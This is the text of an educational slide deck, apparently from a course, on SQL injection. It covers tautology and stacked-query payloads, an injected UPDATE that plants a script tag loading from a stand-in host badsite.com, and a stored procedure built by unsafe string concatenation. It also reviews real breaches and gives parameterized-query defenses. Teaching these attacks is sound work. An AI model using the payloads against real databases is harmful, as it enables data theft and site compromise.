2. What is it?
A technique where
individuals insert or append
commands or coding into
a statement thus altering
the intent and actions of
the perspective query
Allows hackers to view,
delete, or change data in
a compromising way
3. Basic Examples
Utilizing a statement that is always true
Entering a value into a field that will render
a statement condition as always true (1=1
or “”=“”)
SELECT field_name from table_name where
username = ‘’ and 1=1 --’
Appending another command through a
terminating character (such as ;)
4. Types of Vulnerabilities
Incorrect type handling
Database server
Blind injection
Conditional Responses
Conditional Errors
Time Delays
5. Combinations
SQL injection can be
used in conjunction
with XSS, malware,
Javascript, etc.
In 2008, over 1 million
websites compromised
due to hybridized SQL
injection attacks
utilizing other
components
7. HTML Tags
SELECT FIRST_NAME, LAST_NAME FROM
CUSTOMER WHERE USERNAME = ‘’;
UPDATE TABLE CUSTOMER SET
MIDDLE_NAME = ‘<script
src=http://badsite.com>’; --’
8. Stored Procedures
CREATE PROCEDURE
getOrdersByCustomerID @custId
nvarchar[50] AS
EXECUTE(“SELECT OrderID FROM Sales
WHERE CustomerID = ‘” + custId + “’”);
9. Difficulties
Obvious attacks
Structure deletion
Denial of Service
Increase load on the system
Covert attacks
Changes to data
Changes to code
10. Real World: Asprox
Executable installed via phishing emails or
through the network
Searches Google for vulnerable ASP sites
Downloads compromising Javascript from
direct84.com
Attempts to download additional, harmful
Javascript, Asprox copies, Trojan
Danmec, and/or SQL attack tool
11. Real World: Sony
Hacked by LulzSec
Attack on several of Sony’s ventures such
as SonyPictures.com and music division
servers
LulzSec claimed attack resulted from a
single statement
Purportedly injection may have been
involved with PSN attack
12. Real World: Sun & MySQL
TinKode and Ne0h compromised specific
Sun domains
Obtained column names and email
addresses in a table
MySQL.com
Exposed metadata, account names, and
passwords (both admin and blog)
Issue with Web coding, not database
13. Real World: CyberVors
Russian cyber criminal group
Compromised 400,000+ servers and sites
Approx 1.2 billion usernames and
passwords stolen
Indiscriminant targeting of companies
Utilized different hacking methods and
several individuals and groups over
several years
14. Preventative Measures
Blacklisted Words or
characters
Not recommended
Utilizing SQL Parameters
Validation Controls and field
classification
Disallow error messages from
revealing database
metadata
Johnny’s Google Hacking
Database
Johnny.ihackstuff.com/ghdb
16. Validation Samples
try {
<convert input to value of specified type>
}
catch {
<redirect to error page>
}
17. Validation Samples
string ID;
database.querytext = “SELECT ID FROM
TABLENAME WHERE USERID = ?”;
database.addParameter(ID);
database.executeQuery();
18. Follow up Questions
What tools or techniques can be used to
determine vulnerabilities within a system
for SQLi?
Have you had to reassess code to
prevent SQLi vulnerabilities? If so, please
elaborate.
What are some other modern cases
involving SQLi?
19. References & Readings
Arthur, C. (2014). LulzSec hacker arrested over
Sony attack. Retrieved from
http://www.theguardian.com/technology/2012/a
ug/29/lulzsec-hacker-arrest-sony-attack
Databases vulnerable to SQL injections.
(2008). Data Strategy, 3(12), 6.
Dorai, R., & Kannan, V. (2011). SQL Injection-
Database Attack Revolution and
Prevention. Journal Of International Commercial
Law & Technology, 6(4), 224-231.
International Business, T. (0006, July). Post-PSN
hack: Sony apologise at E3 as LulzSec mount fresh
attack. International Business Times.
20. Kirk, J. (2013). Asprox botnet proves to be a
resilient foe. Cio (13284045), 8.
Lemos, R. (2014). Russian Cyber-Gang Gathers 1.2B
Login Credentials Via Website Flaws. Eweek, 7.
OWASP. (2014). SQL Injection. Retrieved from
https://www.owasp.org/index.php/SQL_Injection
Prince, B. (2008). Botnet installs SQL injection
tool. Eweek, 25(16), 21.
Sullivan, B. & Liu, Vincent. (2012). Web Application
Security: A Beginner’s Guide. New York, NY:
McGraw-Hill Companies.
Sun.com, MySQL.com Hacked, SQL Injection
Attack. (2011). Channel Insider, 1.
W3Schools . (2014). SQL injection. Retrieved from
http://www.w3schools.com/sql/sql_injection.asp